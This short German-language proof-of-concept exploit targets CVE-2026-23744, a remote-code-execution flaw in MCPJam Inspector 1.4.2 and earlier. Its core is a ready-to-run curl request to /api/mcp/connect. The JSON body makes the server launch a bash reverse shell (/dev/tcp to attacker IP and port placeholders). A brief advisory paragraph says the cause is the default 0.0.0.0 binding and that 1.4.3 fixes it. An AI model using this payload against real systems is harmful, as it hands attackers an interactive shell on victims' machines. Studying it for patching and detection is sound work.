
Proof-of-Concept-Exploit für CVE-2026-23744, eine Schwachstelle zur Remote-Codeausführung in MCPJam Inspector. Demonstriert RCE mittels manipulierter HTTP-Anfrage an den Endpunkt /api/mcp/connect mit Reverse-Shell-Payload.
PoC über die Schwachstelle in MCP Server.
automatisiert für den POST-Teil mit dem korrekten Body.
/api/mcp/connect
curl http://evil.com:6274/api/mcp/connect --header "Content-Type: application/json" --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'
MCPJam Inspector ist die erste lokale Entwicklungsplattform für MCP-Server. Die Versionen 1.4.2 und früher sind anfällig für die Schwachstelle der Remote-Code-Ausführung (RCE), die es einem Angreifer ermöglicht, eine manipulierte HTTP-Anfrage zu senden, die die Installation eines MCP-Servers auslöst, was zu RCE führt. Da der MCPJam Inspector standardmäßig auf 0.0.0.0 statt 127.0.0.1 hört, kann ein Angreifer das RCE remote über eine einfache HTTP-Anfrage auslösen. Version 1.4.3 enthält einen Patch.